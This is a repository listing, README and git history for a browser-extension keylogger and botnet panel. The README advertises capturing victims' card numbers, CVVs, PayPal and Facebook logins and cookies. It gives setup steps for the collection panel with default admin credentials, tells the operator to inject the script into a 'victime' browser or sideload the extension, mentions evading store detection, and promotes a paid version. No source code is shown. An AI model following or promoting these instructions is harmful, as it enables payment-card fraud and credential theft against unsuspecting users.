======================: FILES :======================
JavascriptKeylogger
├── extension
│   ├── js
│   │   ├── background.js
│   │   ├── jquery-3.5.1.min.js
│   │   └── logger.js
│   ├── manifest.json
│   └── popup.html
├── panel
│   ├── api.php
│   ├── assets
│   │   ├── css
│   │   │   ├── bootstrap.css
│   │   │   ├── bootstrap-grid.min.css
│   │   │   ├── bootstrap.min.css
│   │   │   ├── custom.css
│   │   │   ├── font-awesome.css
│   │   │   ├── main2.css
│   │   │   └── main.css
│   │   ├── font-awesome
│   │   │   └── fonts
│   │   │       ├── FontAwesome.otf
│   │   │       ├── fontawesome-webfont.eot
│   │   │       ├── fontawesome-webfont.svg
│   │   │       ├── fontawesome-webfont.ttf
│   │   │       └── fontawesome-webfont.woff
│   │   ├── fonts
│   │   │   ├── glyphicons-halflings-regular.eot
│   │   │   ├── glyphicons-halflings-regular.svg
│   │   │   ├── glyphicons-halflings-regular.ttf
│   │   │   └── glyphicons-halflings-regular.woff
│   │   ├── img
│   │   │   ├── 1.png
│   │   │   ├── 2.png
│   │   │   ├── 3.png
│   │   │   ├── 4.png
│   │   │   ├── banque.png
│   │   │   └── find_user.png
│   │   └── js
│   │       ├── bootstrap.min.js
│   │       ├── custom.js
│   │       ├── dataTables
│   │       │   ├── dataTables.bootstrap.css
│   │       │   ├── dataTables.bootstrap.js
│   │       │   └── jquery.dataTables.js
│   │       ├── jquery-1.10.2.js
│   │       ├── jquery-3.2.1.slim.min.js
│   │       ├── jquery.metisMenu.js
│   │       ├── morris
│   │       │   ├── morris-0.4.3.min.css
│   │       │   ├── morris.js
│   │       │   └── raphael-2.1.0.min.js
│   │       └── popper.min.js
│   ├── bootstrap
│   │   ├── css
│   │   │   ├── bootstrap.css
│   │   │   ├── bootstrap.css.map
│   │   │   ├── bootstrap-grid.css
│   │   │   ├── bootstrap-grid.css.map
│   │   │   ├── bootstrap-grid.min.css
│   │   │   ├── bootstrap-grid.min.css.map
│   │   │   ├── bootstrap.min.css
│   │   │   ├── bootstrap.min.css.map
│   │   │   ├── bootstrap-reboot.css
│   │   │   ├── bootstrap-reboot.css.map
│   │   │   ├── bootstrap-reboot.min.css
│   │   │   └── bootstrap-reboot.min.css.map
│   │   └── js
│   │       ├── bootstrap.js
│   │       └── bootstrap.min.js
│   ├── config.php
│   ├── cookies.php
│   ├── country
│   │   └── img
│   │       └── flags
│   │           ├── ad.png
│   │           ├── ae.png
│   │           ├── af.png
│   │           ├── ag.png
│   │           ├── ai.png
│   │           ├── al.png
│   │           ├── am.png
│   │           ├── an.png
│   │           ├── ar.png
│   │           ├── as.png
│   │           ├── at.png
│   │           ├── au.png
│   │           ├── aw.png
│   │           ├── ax.png
│   │           ├── az.png
│   │           ├── ba.png
│   │           ├── bb.png
│   │           ├── bd.png
│   │           ├── be.png
│   │           ├── bf.png
│   │           ├── bg.png
│   │           ├── bh.png
│   │           ├── bi.png
│   │           ├── bj.png
│   │           ├── bm.png
│   │           ├── bn.png
│   │           ├── bo.png
│   │           ├── br.png
│   │           ├── bs.png
│   │           ├── bt.png
│   │           ├── bv.png
│   │           ├── bw.png
│   │           ├── by.png
│   │           ├── bz.png
│   │           ├── ca.png
│   │           ├── cc.png
│   │           ├── cd.png
│   │           ├── cf.png
│   │           ├── cg.png
│   │           ├── ch.png
│   │           ├── ci.png
│   │           ├── ck.png
│   │           ├── cl.png
│   │           ├── cm.png
│   │           ├── cn.png
│   │           ├── co.png
│   │           ├── cr.png
│   │           ├── cs.png
│   │           ├── cu.png
│   │           ├── cv.png
│   │           ├── cx.png
│   │           ├── cy.png
│   │           ├── cz.png
│   │           ├── de.png
│   │           ├── dj.png
│   │           ├── dk.png
│   │           ├── dm.png
│   │           ├── do.png
│   │           ├── dz.png
│   │           ├── ec.png
│   │           ├── ee.png
│   │           ├── eg.png
│   │           ├── eh.png
│   │           ├── er.png
│   │           ├── es.png
│   │           ├── et.png
│   │           ├── eu.png
│   │           ├── fi.png
│   │           ├── fj.png
│   │           ├── fk.png
│   │           ├── fm.png
│   │           ├── fo.png
│   │           ├── fr.png
│   │           ├── ga.png
│   │           ├── gb.png
│   │           ├── gd.png
│   │           ├── ge.png
│   │           ├── gf.png
│   │           ├── gg.png
│   │           ├── gh.png
│   │           ├── gi.png
│   │           ├── gl.png
│   │           ├── gm.png
│   │           ├── gn.png
│   │           ├── gp.png
│   │           ├── gq.png
│   │           ├── gr.png
│   │           ├── gs.png
│   │           ├── gt.png
│   │           ├── gu.png
│   │           ├── gw.png
│   │           ├── gy.png
│   │           ├── hk.png
│   │           ├── hm.png
│   │           ├── hn.png
│   │           ├── hr.png
│   │           ├── ht.png
│   │           ├── hu.png
│   │           ├── id.png
│   │           ├── ie.png
│   │           ├── il.png
│   │           ├── im.png
│   │           ├── in.png
│   │           ├── io.png
│   │           ├── iq.png
│   │           ├── ir.png
│   │           ├── is.png
│   │           ├── it.png
│   │           ├── je.png
│   │           ├── jm.png
│   │           ├── jo.png
│   │           ├── jp.png
│   │           ├── ke.png
│   │           ├── kg.png
│   │           ├── kh.png
│   │           ├── ki.png
│   │           ├── km.png
│   │           ├── kn.png
│   │           ├── kp.png
│   │           ├── kr.png
│   │           ├── kw.png
│   │           ├── ky.png
│   │           ├── kz.png
│   │           ├── la.png
│   │           ├── lb.png
│   │           ├── lc.png
│   │           ├── li.png
│   │           ├── lk.png
│   │           ├── lr.png
│   │           ├── ls.png
│   │           ├── lt.png
│   │           ├── lu.png
│   │           ├── lv.png
│   │           ├── ly.png
│   │           ├── ma.png
│   │           ├── mc.png
│   │           ├── md.png
│   │           ├── me.png
│   │           ├── mg.png
│   │           ├── mh.png
│   │           ├── mk.png
│   │           ├── ml.png
│   │           ├── mm.png
│   │           ├── mn.png
│   │           ├── mo.png
│   │           ├── mp.png
│   │           ├── mq.png
│   │           ├── mr.png
│   │           ├── ms.png
│   │           ├── mt.png
│   │           ├── mu.png
│   │           ├── mv.png
│   │           ├── mw.png
│   │           ├── mx.png
│   │           ├── my.png
│   │           ├── mz.png
│   │           ├── na.png
│   │           ├── nc.png
│   │           ├── ne.png
│   │           ├── nf.png
│   │           ├── ng.png
│   │           ├── ni.png
│   │           ├── nl.png
│   │           ├── no.png
│   │           ├── np.png
│   │           ├── nr.png
│   │           ├── nu.png
│   │           ├── nz.png
│   │           ├── om.png
│   │           ├── pa.png
│   │           ├── pe.png
│   │           ├── pf.png
│   │           ├── pg.png
│   │           ├── ph.png
│   │           ├── pk.png
│   │           ├── pl.png
│   │           ├── pm.png
│   │           ├── pn.png
│   │           ├── pr.png
│   │           ├── ps.png
│   │           ├── pt.png
│   │           ├── pw.png
│   │           ├── py.png
│   │           ├── qa.png
│   │           ├── re.png
│   │           ├── ro.png
│   │           ├── rs.png
│   │           ├── ru.png
│   │           ├── rw.png
│   │           ├── sa.png
│   │           ├── sb.png
│   │           ├── sc.png
│   │           ├── sd.png
│   │           ├── se.png
│   │           ├── sg.png
│   │           ├── sh.png
│   │           ├── si.png
│   │           ├── sj.png
│   │           ├── sk.png
│   │           ├── sl.png
│   │           ├── sm.png
│   │           ├── sn.png
│   │           ├── so.png
│   │           ├── sr.png
│   │           ├── st.png
│   │           ├── sv.png
│   │           ├── sy.png
│   │           ├── sz.png
│   │           ├── tc.png
│   │           ├── td.png
│   │           ├── tf.png
│   │           ├── tg.png
│   │           ├── th.png
│   │           ├── tj.png
│   │           ├── tk.png
│   │           ├── tl.png
│   │           ├── tm.png
│   │           ├── tn.png
│   │           ├── to.png
│   │           ├── tr.png
│   │           ├── tt.png
│   │           ├── tv.png
│   │           ├── tw.png
│   │           ├── tz.png
│   │           ├── ua.png
│   │           ├── ug.png
│   │           ├── um.png
│   │           ├── us.png
│   │           ├── uy.png
│   │           ├── uz.png
│   │           ├── va.png
│   │           ├── vc.png
│   │           ├── ve.png
│   │           ├── vg.png
│   │           ├── vi.png
│   │           ├── vn.png
│   │           ├── vu.png
│   │           ├── wf.png
│   │           ├── ws.png
│   │           ├── ye.png
│   │           ├── yt.png
│   │           ├── za.png
│   │           ├── zm.png
│   │           └── zw.png
│   ├── css
│   │   ├── bootstrap
│   │   │   ├── css
│   │   │   │   └── bootstrap.min.css
│   │   │   └── js
│   │   │       ├── bootstrap.bundle.min.js
│   │   │       ├── bootstrap.min.js
│   │   │       ├── jquery-3.4.1.min.js
│   │   │       └── sweetalert.min.js
│   │   ├── icons
│   │   │   ├── 4iCs6KVjbNBYlgoKcg72j00.woff2
│   │   │   ├── 4iCs6KVjbNBYlgoKcQ72j00.woff2
│   │   │   ├── 4iCs6KVjbNBYlgoKcw72j00.woff2
│   │   │   ├── 4iCs6KVjbNBYlgoKew72j00.woff2
│   │   │   ├── 4iCs6KVjbNBYlgoKfA72j00.woff2
│   │   │   ├── 4iCs6KVjbNBYlgoKfw72.woff2
│   │   │   └── flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2
│   │   ├── icons.css
│   │   └── ubuntu.css
│   ├── geo
│   │   ├── GeoIP.dat
│   │   ├── geoip.inc
│   │   ├── geoplugin.class.php
│   │   ├── img
│   │   │   └── flags
│   │   │       ├── ad.png
│   │   │       ├── ae.png
│   │   │       ├── af.png
│   │   │       ├── ag.png
│   │   │       ├── ai.png
│   │   │       ├── al.png
│   │   │       ├── am.png
│   │   │       ├── an.png
│   │   │       ├── ar.png
│   │   │       ├── as.png
│   │   │       ├── at.png
│   │   │       ├── au.png
│   │   │       ├── aw.png
│   │   │       ├── ax.png
│   │   │       ├── az.png
│   │   │       ├── ba.png
│   │   │       ├── bb.png
│   │   │       ├── bd.png
│   │   │       ├── be.png
│   │   │       ├── bf.png
│   │   │       ├── bg.png
│   │   │       ├── bh.png
│   │   │       ├── bi.png
│   │   │       ├── bj.png
│   │   │       ├── bm.png
│   │   │       ├── bn.png
│   │   │       ├── bo.png
│   │   │       ├── br.png
│   │   │       ├── bs.png
│   │   │       ├── bt.png
│   │   │       ├── bv.png
│   │   │       ├── bw.png
│   │   │       ├── by.png
│   │   │       ├── bz.png
│   │   │       ├── ca.png
│   │   │       ├── cc.png
│   │   │       ├── cd.png
│   │   │       ├── cf.png
│   │   │       ├── cg.png
│   │   │       ├── ch.png
│   │   │       ├── ci.png
│   │   │       ├── ck.png
│   │   │       ├── cl.png
│   │   │       ├── cm.png
│   │   │       ├── cn.png
│   │   │       ├── co.png
│   │   │       ├── cr.png
│   │   │       ├── cs.png
│   │   │       ├── cu.png
│   │   │       ├── cv.png
│   │   │       ├── cx.png
│   │   │       ├── cy.png
│   │   │       ├── cz.png
│   │   │       ├── de.png
│   │   │       ├── dj.png
│   │   │       ├── dk.png
│   │   │       ├── dm.png
│   │   │       ├── do.png
│   │   │       ├── dz.png
│   │   │       ├── ec.png
│   │   │       ├── ee.png
│   │   │       ├── eg.png
│   │   │       ├── eh.png
│   │   │       ├── er.png
│   │   │       ├── es.png
│   │   │       ├── et.png
│   │   │       ├── eu.png
│   │   │       ├── fi.png
│   │   │       ├── fj.png
│   │   │       ├── fk.png
│   │   │       ├── fm.png
│   │   │       ├── fo.png
│   │   │       ├── fr.png
│   │   │       ├── ga.png
│   │   │       ├── gb.png
│   │   │       ├── gd.png
│   │   │       ├── ge.png
│   │   │       ├── gf.png
│   │   │       ├── gg.png
│   │   │       ├── gh.png
│   │   │       ├── gi.png
│   │   │       ├── gl.png
│   │   │       ├── gm.png
│   │   │       ├── gn.png
│   │   │       ├── gp.png
│   │   │       ├── gq.png
│   │   │       ├── gr.png
│   │   │       ├── gs.png
│   │   │       ├── gt.png
│   │   │       ├── gu.png
│   │   │       ├── gw.png
│   │   │       ├── gy.png
│   │   │       ├── hk.png
│   │   │       ├── hm.png
│   │   │       ├── hn.png
│   │   │       ├── hr.png
│   │   │       ├── ht.png
│   │   │       ├── hu.png
│   │   │       ├── id.png
│   │   │       ├── ie.png
│   │   │       ├── il.png
│   │   │       ├── im.png
│   │   │       ├── in.png
│   │   │       ├── io.png
│   │   │       ├── iq.png
│   │   │       ├── ir.png
│   │   │       ├── is.png
│   │   │       ├── it.png
│   │   │       ├── je.png
│   │   │       ├── jm.png
│   │   │       ├── jo.png
│   │   │       ├── jp.png
│   │   │       ├── ke.png
│   │   │       ├── kg.png
│   │   │       ├── kh.png
│   │   │       ├── ki.png
│   │   │       ├── km.png
│   │   │       ├── kn.png
│   │   │       ├── kp.png
│   │   │       ├── kr.png
│   │   │       ├── kw.png
│   │   │       ├── ky.png
│   │   │       ├── kz.png
│   │   │       ├── la.png
│   │   │       ├── lb.png
│   │   │       ├── lc.png
│   │   │       ├── li.png
│   │   │       ├── lk.png
│   │   │       ├── lr.png
│   │   │       ├── ls.png
│   │   │       ├── lt.png
│   │   │       ├── lu.png
│   │   │       ├── lv.png
│   │   │       ├── ly.png
│   │   │       ├── ma.png
│   │   │       ├── mc.png
│   │   │       ├── md.png
│   │   │       ├── me.png
│   │   │       ├── mg.png
│   │   │       ├── mh.png
│   │   │       ├── mk.png
│   │   │       ├── ml.png
│   │   │       ├── mm.png
│   │   │       ├── mn.png
│   │   │       ├── mo.png
│   │   │       ├── mp.png
│   │   │       ├── mq.png
│   │   │       ├── mr.png
│   │   │       ├── ms.png
│   │   │       ├── mt.png
│   │   │       ├── mu.png
│   │   │       ├── mv.png
│   │   │       ├── mw.png
│   │   │       ├── mx.png
│   │   │       ├── my.png
│   │   │       ├── mz.png
│   │   │       ├── na.png
│   │   │       ├── nc.png
│   │   │       ├── ne.png
│   │   │       ├── nf.png
│   │   │       ├── ng.png
│   │   │       ├── ni.png
│   │   │       ├── nl.png
│   │   │       ├── no.png
│   │   │       ├── np.png
│   │   │       ├── nr.png
│   │   │       ├── nu.png
│   │   │       ├── nz.png
│   │   │       ├── om.png
│   │   │       ├── pa.png
│   │   │       ├── pe.png
│   │   │       ├── pf.png
│   │   │       ├── pg.png
│   │   │       ├── ph.png
│   │   │       ├── pk.png
│   │   │       ├── pl.png
│   │   │       ├── pm.png
│   │   │       ├── pn.png
│   │   │       ├── pr.png
│   │   │       ├── ps.png
│   │   │       ├── pt.png
│   │   │       ├── pw.png
│   │   │       ├── py.png
│   │   │       ├── qa.png
│   │   │       ├── re.png
│   │   │       ├── ro.png
│   │   │       ├── rs.png
│   │   │       ├── ru.png
│   │   │       ├── rw.png
│   │   │       ├── sa.png
│   │   │       ├── sb.png
│   │   │       ├── sc.png
│   │   │       ├── sd.png
│   │   │       ├── se.png
│   │   │       ├── sg.png
│   │   │       ├── sh.png
│   │   │       ├── si.png
│   │   │       ├── sj.png
│   │   │       ├── sk.png
│   │   │       ├── sl.png
│   │   │       ├── sm.png
│   │   │       ├── sn.png
│   │   │       ├── so.png
│   │   │       ├── sr.png
│   │   │       ├── st.png
│   │   │       ├── sv.png
│   │   │       ├── sy.png
│   │   │       ├── sz.png
│   │   │       ├── tc.png
│   │   │       ├── td.png
│   │   │       ├── tf.png
│   │   │       ├── tg.png
│   │   │       ├── th.png
│   │   │       ├── tj.png
│   │   │       ├── tk.png
│   │   │       ├── tl.png
│   │   │       ├── tm.png
│   │   │       ├── tn.png
│   │   │       ├── to.png
│   │   │       ├── tr.png
│   │   │       ├── tt.png
│   │   │       ├── tv.png
│   │   │       ├── tw.png
│   │   │       ├── tz.png
│   │   │       ├── ua.png
│   │   │       ├── ug.png
│   │   │       ├── um.png
│   │   │       ├── us.png
│   │   │       ├── uy.png
│   │   │       ├── uz.png
│   │   │       ├── va.png
│   │   │       ├── vc.png
│   │   │       ├── ve.png
│   │   │       ├── vg.png
│   │   │       ├── vi.png
│   │   │       ├── vn.png
│   │   │       ├── vu.png
│   │   │       ├── wf.png
│   │   │       ├── ws.png
│   │   │       ├── ye.png
│   │   │       ├── yt.png
│   │   │       ├── za.png
│   │   │       ├── zm.png
│   │   │       └── zw.png
│   │   └── index.php
│   ├── index.php
│   ├── keyboard.php
│   ├── log1.php
│   ├── login.php
│   ├── os.php
│   ├── remove1.php
│   └── remove.php
└── README.md

26 directories, 570 files
======================: README CONTENT :======================
# Javascript Keylogger V3
javascript botnet browser chrome / firefox  is a keylogger to capture card number ,
expiration date,CVV any web site ,paypal,facebook,e-commerce ...etc 
best keylogger javascript 


| Name         | Value                  |
| -----------: | :--------------------- |
| Version      |    4 (Free  )          |
| Language     | Javascript, PHP        |
| Keylogger    |  Chrome,Firefox        | 
| Cookies      |   Firefox              |

All UPDATE OF THIS PROJECT CAN FOUND HERE  https://github.com/hakanonymos/botnet-browser-chrome

# Screenshot (older panel )
![1](https://user-images.githubusercontent.com/30985149/76715397-24141180-6724-11ea-8623-21d963a81c92.png)

![2](https://user-images.githubusercontent.com/30985149/76715402-28d8c580-6724-11ea-977b-cccdb0b1e8b3.png)



![card-bot](https://user-images.githubusercontent.com/30985149/76715424-3f7f1c80-6724-11ea-835a-773edb2b24f0.jpg)



# Screenshot (2020 )

![téléchargement (1)](https://user-images.githubusercontent.com/30985149/93617576-0e7eed80-f9ce-11ea-98a6-d169bdf9bf97.jpg)


open log without redirect , remove log very simple

![keylogger](https://user-images.githubusercontent.com/30985149/97839477-3e374a00-1d1d-11eb-9e3a-18aed786b68c.JPG)



| Name         | Value                  | 
| -----------: | :--------------------- |
| Version      |    Pro                 |
| Baypass      |  Chrome and Firefox    |
                                     
  https://shoppy.gg/product/5d9ifM3    



# Configuration : Server

Start your wampserver,xamp ....etc and send the "server" folder to your server
+ server
1. `config.php`

usernam  = admin

password = admin


# Configuration : extension

inject javascript code into web browser of victime or use extension chrome or mozilla firefox

Open the extension folder js/
+ logger.js
put the name of your website for exemple `http://127.0.0.1
and save changes

+ `background.js`
change "url" redirect after install extension and "url" of cookies

# Installation Chrome / Firefox
+ Chrome
1. Open Chrome browser and navigate to `chrome://extensions`
2. Select "Developer Mode" and then click "Load unpacked extension...
3. load folder extension

+ Mozilla Firefox
1. Open Firefox browser and navigate to `about:debugging`
2. Click "Load Temporary Add-on"  
3. click `manifest.json`

 to upload extension in mozilla firefox or chrome web store you need a new version fud  or some technique .


# Demo video  Facebook : 

  Chrome  +  https://web.facebook.com/102313318301415/videos/651706715777891/



Firefox  +  https://web.facebook.com/102313318301415/videos/348004879720079/


## Contact 

hakanonymos@hotmail.com

instagram ,ICQ ,Skype : hakanonymos

Whatsapp: +1 336 415 3487


  


====================== GIT HISTORY: ======================
1d23872 HEAD@{0}: clone: from https://github.com/hakanonymos/JavascriptKeylogger
commit 1d238722fd3d54b35eb7a08af56d09efe5b6a7bc
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:52:17 2020 +0800

    Update README.md

commit a7578ea01116ff302379980dc672b803e639302f
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:50:17 2020 +0800

    Update README.md

commit d4f3d3bc69e33b1ee3abc3daeede716bbb276b72
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:48:05 2020 +0800

    Update background.js

commit f05d10c93fa864986443ebfe85be3969dccb3d8b
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:47:21 2020 +0800

    Update logger.js

commit d8d9b9487410ee06c1d2454520d5bd630a5a0599
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:46:36 2020 +0800

    Add files via upload

commit 629a89531815cf638ea25c7c70900380c1c4ddcf
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:45:05 2020 +0800

    Add files via upload

commit 40f85c158d0f8600855e1d07da7dfc6cf10575df
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:43:31 2020 +0800

    Add files via upload

commit 752daef6a17c0124bba40f56bc464f27fe56fa55
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:42:33 2020 +0800

    Delete keystrokes.php

commit 00e886b44703703726059057948fc8fc7edb176a
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:42:21 2020 +0800

    Delete log2.php

commit aef7b3839866324b2e29307e856e2d423b349b36
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Nov 2 15:42:08 2020 +0800

    Delete log1.php

commit 9c74b494e081fc0513efe2d655a946e17429700a
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Oct 12 19:40:21 2020 +0000

    Update README.md

commit a85f70be9cd5badc6cbe6af33ba028f384816179
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Sep 21 17:55:40 2020 +0100

    Update README.md

commit 469863210fae213fe6316cb7b23e566ba00abf5a
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Fri Sep 18 01:26:21 2020 +0100

    Update README.md

commit 5cb616a4ec47e5393387cef2483cb76719d3fba4
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Wed Sep 16 03:20:07 2020 +0100

    Update README.md

commit 66213c91822a26e90094c42b26c64ae308793c7e
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Wed Sep 16 03:15:19 2020 +0100

    Update log1.php

commit f0c854ee6e5e286df2767d8f23522f51c77bce8e
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Sep 14 02:52:40 2020 +0100

    Add files via upload

commit d56626488d99a480a7ac75959c5aace837bc6115
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Sep 14 01:59:07 2020 +0100

    Update README.md

commit a35142258a3498c840ec1f8f2638c75ad24025c8
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Sep 14 01:58:12 2020 +0100

    Update README.md

commit 7955646614f496ae300c8a2cd46e95f21bbb83a5
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Sep 14 01:56:57 2020 +0100

    Update index.php

commit bf398a9290214759f351952e199c7e1096362d37
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Mon Sep 14 01:55:54 2020 +0100

    Update log1.php

commit 4380babbe80a82329731d717d8e6de9b9ebaf50d
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:30:51 2020 +0100

    Delete w-Njms8rZYd.css

commit 1622e3c9ae273414f3a06dad8f99134db4c8d3bb
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:30:41 2020 +0100

    Delete qE6QDm9Ppka.css

commit 9f5456a4dd7c78b57f6a9e3bd9c01699391e2790
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:30:31 2020 +0100

    Delete osEgfMAdNjX.css

commit 3d73e482f94fdc6772dc6a197a49f7225e60188f
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:30:18 2020 +0100

    Delete b_Z_ANTUWtx.css

commit 11d22ce1132a6e08a9f42da3cb92247acc331bae
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:30:07 2020 +0100

    Delete Lc8uGBL4XRo.css

commit 749f467018dbc490f14158c68148f7716c080262
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:29:57 2020 +0100

    Delete K8tRINoE0Wo.css

commit 2ad384a72f88fbf9c0024d990479d880f3e1e611
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:29:43 2020 +0100

    Delete pic.jpg

commit bb5d9a3a4001618f0d9cbde77d3a3dad95fd8778
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:28:50 2020 +0100

    Delete qnWloLHmf1n.png

commit 4b7595f635a4af7ca6f9344cff08d262e0a6da6a
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:28:34 2020 +0100

    Delete prendre.php

commit 9164db690963655aa8d0dd2ed0ac855aaec223b3
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:28:24 2020 +0100

    Delete index.html

commit 8eaa5fc699ee6fa898d2faa16d4bde3e53984612
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 09:01:24 2020 +0100

    Update README.md

commit 3cd3131006d649b2956ff35763b88bcf4bbc2a35
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:59:21 2020 +0100

    Update README.md

commit 4604954972c1c1160c66d80ef0433e4eeaf6ceb4
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:11:15 2020 +0100

    Update README.md

commit 7a1af1da2072581d1de58da2e7826725efcc5ce6
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:09:08 2020 +0100

    Delete index.php

commit 04f85a82ad54be0b548d0f3b01dbf22fe797b317
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:08:58 2020 +0100

    Delete geoip.inc

commit fcfa9cca272c712e1b3c07533e2d9b8e5be87e0a
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:08:49 2020 +0100

    Delete geoplugin.class.php

commit cfc45b07d22b036717a2b330ee61b70348b32442
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:08:41 2020 +0100

    Delete bots.php

commit 9456f5b3ad332c116c9cfbce3cee73a542c4060b
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:08:32 2020 +0100

    Delete GeoIP.dat

commit 365074e57b857daccb9d42894eaf028359b752d9
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:08:10 2020 +0100

    Delete log.html

commit 7fd539c7014f282817868ed9a002e6f96777ea6c
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:07:39 2020 +0100

    Delete login.php

commit 7996e075a3eb586d2eb7bf1085036ce08590057e
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:07:28 2020 +0100

    Delete keystrokes.php

commit e48503a8da9393d9648ba5dae24f753861ebb5b5
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:07:18 2020 +0100

    Delete email-password.php

commit e0807e9d5282af221ac806cb01aa7162980df73c
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:07:05 2020 +0100

    Delete banque.php

commit d52a3fe9d53e19970f2c1cd9b6b60f63f194a237
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:06:14 2020 +0100

    Delete log.html

commit 20105edcaab58d1dd8fe9a844ded1c0541d9a655
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:05:43 2020 +0100

    Update README.md

commit 51ab4b9b9670c6399fd1cd8b8a33330afa455321
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:03:57 2020 +0100

    Update README.md

commit efe1daf4b750752afd653fc345a69e8d3996d3a5
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 08:01:29 2020 +0100

    Update README.md

commit 587da544313fa8be70355ae07ecfed48987b18a3
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:58:36 2020 +0100

    Update README.md

commit 10e96d7fec3d274f49624fb1d63df62c8297ba24
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:54:52 2020 +0100

    Update README.md

commit 0ebd794f94a8f8a1c03117bdb97af9a5f00e2079
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:54:21 2020 +0100

    Update README.md

commit f6f964d50d2a503d266a720650df033cafcc918a
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:16:54 2020 +0100

    Delete jquery-3.1.1.js

commit 8d95d60768f428700e9024f160e94d0f7d41c062
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:16:30 2020 +0100

    Delete icon.png

commit 81b86e0d78c985b740bcbc47f9355ae649bc44e7
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:16:02 2020 +0100

    Add files via upload

commit 5770bedb23429b036936a6d45b6b02d125ab41a9
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:13:30 2020 +0100

    Add files via upload

commit 876b69fc1c6c03add846fecac9c2e571289f780d
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:11:03 2020 +0100

    Add files via upload

commit df52dc0421347df35d6fcc4c9c3a4edabc847463
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:07:23 2020 +0100

    Add files via upload

commit f5b715d79759e1732be113d82c3d385a38a5628c
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 07:03:35 2020 +0100

    Add files via upload

commit 1867dfdaf42f91578381581c631298098cba4de9
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Sat Sep 12 06:59:18 2020 +0100

    Add files via upload

commit 5bee116fe5965d566896995a0b58fb005a0d1d52
Author: hakanonymos <30985149+hakanonymos@users.noreply.github.com>
Date:   Wed May 6 10:19:49 2020 +0000

    Update README.md

commit c5e41c720f4fcfeff78aede08ba1770b5fe6ca86
